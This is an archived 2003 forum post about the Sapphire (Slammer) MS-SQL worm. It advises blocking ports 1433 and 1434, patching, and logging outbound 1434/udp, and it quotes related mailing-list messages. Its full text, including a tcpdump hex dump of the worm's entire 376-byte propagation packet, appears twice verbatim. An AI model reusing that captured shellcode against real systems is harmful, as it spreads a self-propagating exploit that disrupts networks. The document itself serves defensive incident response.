prana
01-26-2003, 05:09 PM
heard...
Block open ports 1433, 1434 off the internet for both UDP and TCP. The worm which crippled the internet 3 days ago, spreads by causing a DoS attack on SQL 2000 and border Cisco routers, causing lock ups.
A patch has been out for a long time, so its time to patch and DENY and DROP those packets.
I've completed an analysis of the 'Sapphire' SQL worm targeting MS-SQL
servers. Some have reported massive slowdowns. An interesting part of this
worm results from its use of UDP. Attacked hosts/networks may generate ICMP
Host/Port Unreachable messages in response to a Sapphire attack, amplifying
the attack's strength. One reason that this attack is worse for users of
home systems, etc. that don't run any servers, is because Sapphire sends the
entire 400 bytes or so in the initial packet, where scans from Code Red and
bretheren only prompted a 26 byte TCP SYN packet.
The full analysis is available at:
http://www.techie.hopto.org/sqlworm.html
Hi,
This seems to have started for us about 4:30pm (GMT+11) today.
Lucky for us we block all MS-SQL 1434/udp traffic. We have logged over
130,000 firewall blocked connections across 15 odd sites, and it's comming in
from all over the world.
I don't have any infected servers to study the habits of this worm, but the
payload seems to always look pretty much like this.
8<---snip
20:56:02.115087 X.X.X.X.4178 > X.X.X.X.1434: [udp sum ok] udp 376 (ttl 109,
id 46811)
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å..
0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨....
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ°
0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p®
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸.
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔPÿ.
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðPÿ.P¾..®
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..®
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b Bÿ.ÿÐ1ÉQQP.ñ....
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀPÿ
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j.ÿÐP.EÄP.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀPÿ..Æ.Û.ó<aÙÿ.E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.)
0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P
0190: ffd6 ebca ÿÖëÊ
8<---snip
I would also recommend that all your IDS sensors get a new signature to record
all outbound 1434/udp in case it sneaks into your networks via private links,
etc.
Regards,
Ed.
> I'm getting massive packet loss to various points on the globe.
> I am seeing a lot of these in my tcpdump output on each
> host.
>
> 02:06:31.017088 150.140.142.17.3047 > 24.193.37.212.ms-sql-m: udp 376
> 02:06:31.017244 24.193.37.212 > 150.140.142.17: icmp: 24.193.37.212 udp
> port ms-sql-m unreachable [tos 0xc0
>
> It looks like there's a worm affecting MS SQL Server which is
> pingflooding addresses at some random sequence.
>
> All admins with access to routers should block port 1434 (ms-sql-m)!
>
> Everyone running MS SQL Server shut it the hell down or make
> sure it can't access the internet proper!
>
> I make no guarantees that this information is correct, test it
> out for yourself!
Some News: http://news.zdnet.co.uk/story/0,,t269-s2099780,00.html
Advisory: http://www.nextgenss.com/advisories/mssql-udp.txt
Microsoft Fix:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp
MS SQL listens on port 1434/udp so that clients can figure out which method
of communication to use (named pipes, tcp/ip et al)
there are two problems that yield ability to execute code remotely while
unauthenticated.
Block open ports 1433, 1434 off the internet for both UDP and TCP. The worm which crippled the internet 3 days ago, spreads by causing a DoS attack on SQL 2000 and border Cisco routers, causing lock ups.
A patch has been out for a long time, so its time to patch and DENY and DROP those packets.
I've completed an analysis of the 'Sapphire' SQL worm targeting MS-SQL
servers. Some have reported massive slowdowns. An interesting part of this
worm results from its use of UDP. Attacked hosts/networks may generate ICMP
Host/Port Unreachable messages in response to a Sapphire attack, amplifying
the attack's strength. One reason that this attack is worse for users of
home systems, etc. that don't run any servers, is because Sapphire sends the
entire 400 bytes or so in the initial packet, where scans from Code Red and
bretheren only prompted a 26 byte TCP SYN packet.
The full analysis is available at:
http://www.techie.hopto.org/sqlworm.html
Hi,
This seems to have started for us about 4:30pm (GMT+11) today.
Lucky for us we block all MS-SQL 1434/udp traffic. We have logged over
130,000 firewall blocked connections across 15 odd sites, and it's comming in
from all over the world.
I don't have any infected servers to study the habits of this worm, but the
payload seems to always look pretty much like this.
8<---snip
20:56:02.115087 X.X.X.X.4178 > X.X.X.X.1434: [udp sum ok] udp 376 (ttl 109,
id 46811)
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å..
0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨....
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ°
0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p®
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸.
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔPÿ.
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðPÿ.P¾..®
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..®
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b Bÿ.ÿÐ1ÉQQP.ñ....
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀPÿ
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j.ÿÐP.EÄP.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀPÿ..Æ.Û.ó<aÙÿ.E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.)
0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P
0190: ffd6 ebca ÿÖëÊ
8<---snip
I would also recommend that all your IDS sensors get a new signature to record
all outbound 1434/udp in case it sneaks into your networks via private links,
etc.
Regards,
Ed.
> I'm getting massive packet loss to various points on the globe.
> I am seeing a lot of these in my tcpdump output on each
> host.
>
> 02:06:31.017088 150.140.142.17.3047 > 24.193.37.212.ms-sql-m: udp 376
> 02:06:31.017244 24.193.37.212 > 150.140.142.17: icmp: 24.193.37.212 udp
> port ms-sql-m unreachable [tos 0xc0
>
> It looks like there's a worm affecting MS SQL Server which is
> pingflooding addresses at some random sequence.
>
> All admins with access to routers should block port 1434 (ms-sql-m)!
>
> Everyone running MS SQL Server shut it the hell down or make
> sure it can't access the internet proper!
>
> I make no guarantees that this information is correct, test it
> out for yourself!
Some News: http://news.zdnet.co.uk/story/0,,t269-s2099780,00.html
Advisory: http://www.nextgenss.com/advisories/mssql-udp.txt
Microsoft Fix:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp
MS SQL listens on port 1434/udp so that clients can figure out which method
of communication to use (named pipes, tcp/ip et al)
there are two problems that yield ability to execute code remotely while
unauthenticated.